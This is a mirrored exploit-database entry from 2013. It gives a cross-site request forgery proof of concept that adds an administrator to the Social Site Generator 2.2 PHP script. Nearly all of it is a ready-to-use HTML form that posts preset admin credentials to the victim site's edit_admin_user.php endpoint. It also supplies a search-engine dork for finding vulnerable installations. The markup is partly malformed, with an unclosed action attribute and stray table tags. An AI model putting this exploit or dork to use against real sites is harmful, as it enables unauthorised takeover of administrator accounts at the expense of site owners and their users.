Social Site Generator 2.2 – Cross-Site Request Forgery (Add Admin)

• Exploit Database
• 10 阅读

• 作者： Fallaga
  日期： 2013-05-06
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/25245/

• # Exploit Title: social generator Remote Add Admin Exploit
  # Date: 02/05/2013
  # Author: Fallaga
  #Script url:www.socialsitegeneratorscript.com
  # Version: 2.2
  # Tested on: Windows
  # CVE : ()
  # Dork: inurl:my_profile.php?user_id=MTM=
  ##################################################################################
  
  
  <html>
  <form method="post" action="
  http://server/admin/edit_admin_user.php?eventid=10
  
  <td width="17%" align="left" nowrap
  class="text"><strong>Username:</strong></td>
  <td width="83%"><table border="0"
  cellspacing="0" cellpadding="2">
  <tr>
  <td nowrap align="left"><input
  name="txt_username" type="text" value="JaMbA"/></td>
  </tr>
  </table></td>
  
  </tr>
  <tr>
  <td nowrap class="text"
  align="left"><strong>Password:</strong></td>
  <td><table border="0" cellspacing="0"
  cellpadding="2">
  <tr>
  <td nowrap align="left" class="text"><input name="txt_password"
  type="password" value="abdotv"/></td>
  </tr>
  </table></td>
  
  </tr>
   <tr>
  <td nowrap class="text"
  align="left"><strong>Confirm Password:</strong></td>
  <td><table border="0" cellspacing="0"
  cellpadding="2">
  <tr>
  <td nowrap align="left" class="text"><input name="txt_cpassword"
  type="password" value="abdotv"/></td>
  </tr>
  </table></td>
  
  </tr>
  
  <tr>
  
  <td></td>
  </tr>
  
  <tr>
  
  
  
  
  
  
  </tr>
  <tr>
  
  <td></td>
  </tr>
  
  <tr>
  
  </tr>
  
  <tr>
  
  
  </tr>
  
  <tr>
  <td valign="top"> </td>
  <td><tableborder="0" cellspacing="0"
  cellpadding="2">
  <tr>
  
  <td width="165" align="center">
  <input type="submit"
  value="Submit" name="btn_submit" >
   </td>
  <td width="6"> </td>
  </tr>
  </table></td>
  </tr>
  </table></td>
  </tr>
  
  </table></td>
  </tr>
  </table></td>
  </tr>
  </table>
  </form></td>
  </tr>
  </table></td>
  </tr>
  
  <tr>
  <td><table width="100%" border="0" cellspacing="0" cellpadding="0">
  <tr>
  <td width="3%" align="left" background="images/layoutadmin_109.jpg"
  style="background-repeat:repeat-x" ><img src="https://www.exploit-db.com/exploits/25245/images/layoutadmin_108.jpg"
  width="33" height="20" alt="" /></td>
  <td background="images/layoutadmin_109.jpg"> </td>
  <td width="3%" align="right"
  background="images/layoutadmin_109.jpg" style="background-repeat:repeat-x"
  ><img src="https://www.exploit-db.com/exploits/25245/images/layoutadmin_111.jpg" width="33"height="20" alt=""/></td>
  </tr>
  </table></td>
  </tr>
  
  </table>
  </body>
  </html>
  ++++++++++++++++++++++++++++++++++++++++++++++++++++++
  Greetz: FaLLAGa Gov TN